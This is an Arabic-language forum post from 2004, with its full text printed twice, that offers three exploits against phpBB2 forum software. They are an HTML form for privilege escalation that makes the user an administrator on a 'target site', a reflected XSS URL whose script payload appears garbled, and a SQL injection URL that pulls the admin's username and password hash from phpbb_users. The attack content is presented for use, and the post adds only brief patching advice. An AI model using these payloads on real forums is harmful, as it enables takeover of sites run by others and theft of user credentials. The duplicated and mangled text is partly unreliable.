Super_RedHat
11-08-2004, 02:13
بسم الله الرحمن الرحيم
#==============#
|| كتبه Super_RedHat ||
| الثلاثاء 1425-06-24هـ ||
|| الحقوق محفوظه لكاتبه ||
|| ولا يجوز نسخ الموضوع||
|| ونشره إلا مع الحقوق ||
|| Super_RedHat@hotmail.com ||
#==============#
ثغرة خطيرة جدأ في منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
شفرة
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
الحل موجود هنا :
1- اذا كنت مصمم ماتبي غيرهالمنتدى يجب ان تحدث نسختك الى اخر اصدار وهو 2.0.3
2- أنصحك بالأنتقال الى منتدى Invision Board
وزاجل ماقصر نزل تعاريب للمنتدى منتدى حلو وقوي
بس عيبه الهاكات صعب تركيب الهاكات :rolleyes
::::::::
الثغرة رقم2
الاصدر المصاب هو Powered by phpBB 2.0.6
كل ما عليك تطبق الكود
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>document.write(document.&@#&@#&@#&@#&@#&@#);</script>&category_rows[0][cat_order]=99
الثغرة رقم 3
الاصدر المصاب هو Powered by phpBB 2.0.9
كل ما عليك هو تطبق هذا الكود
http://www.xxxxx.com/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_passwo rd%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMI T%201/*
تحيتي لكم
#==============#
|| كتبه Super_RedHat ||
| الثلاثاء 1425-06-24هـ ||
|| الحقوق محفوظه لكاتبه ||
|| ولا يجوز نسخ الموضوع||
|| ونشره إلا مع الحقوق ||
|| Super_RedHat@hotmail.com ||
#==============#
ثغرة خطيرة جدأ في منتدى من نوع
PhpBB2
في ملف admin_ug_auth.php
الوصف:
يمكنك من خلال هذه الثغرة أن تأخذ تصريح بأن تكون مدير والمشرف العام على المنتدى
وبذلك يمكنك الدخول الى لوحة التحكم متى شئت
الأصدار:
2.0.0
لتجربة الثغرة اولا سجل بالمنتدى
ثم احفظ رقم عضويتك بالمنتدى
بعدها افتح المفكرة وانسخ مايلي اليها
شفرة
<html>
<head>
</head>
<body>
<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
عدل هذا العنوان الى عنوان الموقع المستهدف http://www.domain_name/board_directory
اخفظه بامتدادhtml
عندما تدخل الى الصفحة التي قمت بحفظها سوف تجد
قائمة والتي يتم اختيار التصريح الذي تريده لتطبيق الثغرة اختر تصريح Administrator
ثم بالمربع الجانبي شع رقم عضويتك بالمنتدى
أضغط زر submit
بعدها سوف تاتيك شاشة تسجيل الدخول ضع اسم المستخدم وكلمة المرور الخاصة بك
الحل موجود هنا :
1- اذا كنت مصمم ماتبي غيرهالمنتدى يجب ان تحدث نسختك الى اخر اصدار وهو 2.0.3
2- أنصحك بالأنتقال الى منتدى Invision Board
وزاجل ماقصر نزل تعاريب للمنتدى منتدى حلو وقوي
بس عيبه الهاكات صعب تركيب الهاكات :rolleyes
::::::::
الثغرة رقم2
الاصدر المصاب هو Powered by phpBB 2.0.6
كل ما عليك تطبق الكود
http://www.xxxxx.com/php/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>document.write(document.&@#&@#&@#&@#&@#&@#);</script>&category_rows[0][cat_order]=99
الثغرة رقم 3
الاصدر المصاب هو Powered by phpBB 2.0.9
كل ما عليك هو تطبق هذا الكود
http://www.xxxxx.com/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_passwo rd%20FROM%20phpbb_users%20WHERE%20user_id=2%20LIMI T%201/*
تحيتي لكم